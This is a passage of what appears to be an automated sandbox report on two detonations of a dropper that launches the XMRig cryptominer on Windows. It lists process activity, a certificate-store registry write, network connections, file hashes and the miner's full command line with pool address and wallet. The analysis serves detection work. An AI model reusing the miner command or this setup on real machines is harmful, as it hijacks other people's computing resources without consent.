memory/4624-54-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-55-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-56-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-57-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-58-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-59-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-60-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-61-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-62-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-63-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-64-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-65-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-66-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-67-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-68-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-69-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-70-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-71-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-72-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-73-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-74-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-75-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-76-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-77-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-78-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-79-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-80-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-81-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-82-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-83-0x00007FF647190000-0x00007FF647C93000-memory.dmp
memory/4624-84-0x00007FF647190000-0x00007FF647C93000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3396 wrote to memory of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3396 wrote to memory of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1036-16-0x0000014DBEBA0000-0x0000014DBEBC0000-memory.dmp
memory/1036-17-0x0000014DBEBE0000-0x0000014DBEC00000-memory.dmp
memory/1036-18-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-21-0x0000014DC03D0000-0x0000014DC03F0000-memory.dmp
memory/1036-20-0x0000014DBEC00000-0x0000014DBEC20000-memory.dmp
memory/1036-19-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-22-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-23-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-24-0x0000014DBEC00000-0x0000014DBEC20000-memory.dmp
memory/1036-25-0x0000014DC03D0000-0x0000014DC03F0000-memory.dmp
memory/1036-26-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-27-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-28-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-29-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-30-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-31-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-32-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-33-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-34-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-35-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-36-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-37-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-38-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-39-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-40-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-41-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-42-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-43-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-44-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-45-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-46-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-47-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-48-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-49-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-50-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-51-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-52-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-53-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-54-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-55-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-56-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-57-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-58-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-59-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-60-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-61-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-62-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-63-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-64-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-65-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-66-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-67-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-68-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-69-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-70-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-71-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-72-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-73-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-74-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-75-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-76-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-77-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-78-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-79-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-80-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-81-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-82-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-83-0x00007FF658240000-0x00007FF658D43000-memory.dmp
memory/1036-84-0x00007FF658240000-0x00007FF658D43000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4956 wrote to memory of 1176 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4956 wrote to memory of 1176 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1176-16-0x000001BD55C70000-0x000001BD55C90000-memory.dmp
memory/1176-17-0x000001BD57570000-0x000001BD57590000-memory.dmp
memory/1176-18-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-19-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-21-0x000001BD575B0000-0x000001BD575D0000-memory.dmp
memory/1176-20-0x000001BD57590000-0x000001BD575B0000-memory.dmp
memory/1176-22-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-23-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-24-0x000001BD57590000-0x000001BD575B0000-memory.dmp
memory/1176-25-0x000001BD575B0000-0x000001BD575D0000-memory.dmp
memory/1176-26-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-27-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-28-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-29-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-30-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-31-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-32-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-33-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-34-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-35-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-36-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-37-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-38-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-39-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-40-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-41-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-42-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-43-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-44-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-45-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-46-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-47-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-48-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-49-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-50-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-51-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
memory/1176-52-0x00007FF6786B0000-0x00007FF6791B3000-memory.dmp
